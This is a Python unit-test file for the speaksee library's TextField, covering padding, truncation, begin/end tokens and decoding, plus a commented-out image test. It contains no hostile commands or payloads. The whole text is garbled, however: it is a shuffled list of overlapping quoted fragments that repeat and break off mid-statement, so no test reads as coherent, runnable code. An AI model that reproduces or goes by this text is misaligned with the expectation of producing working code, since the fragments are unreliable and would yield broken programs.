field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]]", "numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image", "'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for", "2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch,", "utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data as data import", "expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0:", "= '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]]", "TestTextField(object): def test_pad(self): # Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\",", "2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) ==", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch,", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly handled. field", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\",", "== expected_padded_minibatch # Test init_token is properly handled. 
field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch", "== (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert", "MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs = [] expected_output", "[\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\",", "fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\",", "Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\",", "pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs", "\"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field", "= [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch", "captions word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1], [2, 1,", "is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "eos_token are properly handled. 
field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\",", "\"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths =", "__future__ import unicode_literals import unittest import speaksee.data as data import numpy as np", "data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads.", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\",", "= data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\",", "= data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and", "assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output =", "field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "= [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\",", "[0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of", "\"<pad>\"]] expected_lengths = [5, 2, 3] assert 
field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True)", "def test_pad(self): # Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\",", "= [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True)", "expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self):", "word_idxs = [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) #", "word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) ==", "= {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab", "= [] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output", "[\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled.", "for PyTorch tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output", "expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2:", "[\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5,", "\"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field", "[ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\",", "assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token):", "[\"one\", \"last\", 
\"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field", "3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested", "[\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\",", "\".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\",", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\",", "[] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs", "== expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output", "include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\",", "[\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\",", "def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output", "test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) ==", "expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): #", "= [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", 
\"another\", \"<eos>\",", "3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch)", "field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field", "\"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field", "== (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\",", "{0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab =", "\"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4,", "properly truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch =", "np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = ''", "Test init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch =", "# Test init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch", "class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token,", "# Default case. 
field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "[[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths", "field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True)", "\"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field", "torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image =", "\"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch", "# Batch of captions word_idxs = [[0, 3, 2, 1], [3, 3, 2,", "truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"],", "expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert", "include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly", "\"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\",", "field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch", "def test_preprocessing(self): field = data.ImageField() image = '' expected_image = '' assert field.preprocess(image)", "= [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch)", "field.pad(minibatch) == expected_padded_minibatch field = 
data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "import unittest import speaksee.data as data import numpy as np import torch '''class", "= '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default", "= [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3,", "= [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) ==", "unicode_literals import unittest import speaksee.data as data import numpy as np import torch", "(not tested for PyTorch tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs)", "truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert", "speaksee.data as data import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self):", "= data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs,", "-*- from __future__ import unicode_literals import unittest import speaksee.data as data import numpy", "\"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch)", "assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly handled.", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\",", "tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs))", "assert field.pad(minibatch) == 
(expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) ==", "== expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ]", "test_preprocessing(self): field = data.ImageField() image = '' expected_image = '' assert field.preprocess(image) ==", "expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\",", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) #", "\".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test", "minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch", "test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert", "\"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert", "= data.ImageField() image = '' expected_image = '' assert field.preprocess(image) == expected_image '''", "expected_padded_minibatch # Test init_token is properly handled. 
field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch =", "init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "\"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) ==", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\",", "field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\")", "expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\",", "handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "[[0, 3, 2, 1], [3, 3, 2, 1], [2, 1, 1, 1]] expected_output", "\"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4,", "assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field = data.TextField(fix_length=4,", "[\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4]", "-*- coding: utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data as" ]
[ "'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH =", "SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL =", "= 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu'", "750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT", "'<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL", "Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO", "'/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres']", "= 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088", "USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL =", "BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO =", "= 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php'", "= 'UNDEFINED' 
SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH", "SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out'", "'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00'", "['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR =", "SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR", "SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3", "CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH =", "this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH =", "= '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7'", "= '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change", "Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt'", "'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 
'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL", "'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting", "HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR +", "'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0", "= 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR", "SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER", "'\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this", "= 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR +", "#Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH", "SWC_USERNAME = ['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18'", "<gh_stars>0 SWC_USERNAME = ['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL =", "8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED'", "'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH", 
"MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR", "SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR", "'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR =", "= '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres',", "path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR", "= 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER =", "END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/'", "= ['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR", "= BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR + 'swc-api/Log", "= 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR =", "BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR + 'swc-api/Log Archives/'", "GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT =", "UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = 
'/home/nonroot/Projects/' #Change this path", "= 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR =", "'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/'" ]
[ "StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) +", "% 2 != 0: hashes.append(hashes[-1]) i = 0 j = 0 while i", "+ 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i +=", "bitcoin core implementation ''' import pandas as pd from hashlib import sha256 from", "# h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4)", "transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes =", "h(2) ) + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset =", "0 j = 0 while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i]", "<filename>merkle.py<gh_stars>1-10 ''' Generate root merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as", "I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin", "root merkle tree hash in python. 
I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree -->", "from hashlib import sha256 from io import StringIO # h( h(1) + h(2)", "= pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) >", "len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j +=", "hashlib import sha256 from io import StringIO # h( h(1) + h(2) )", "as pd from hashlib import sha256 from io import StringIO # h( h(1)", "2 j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in", "i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i", "io import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h(", "BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas", 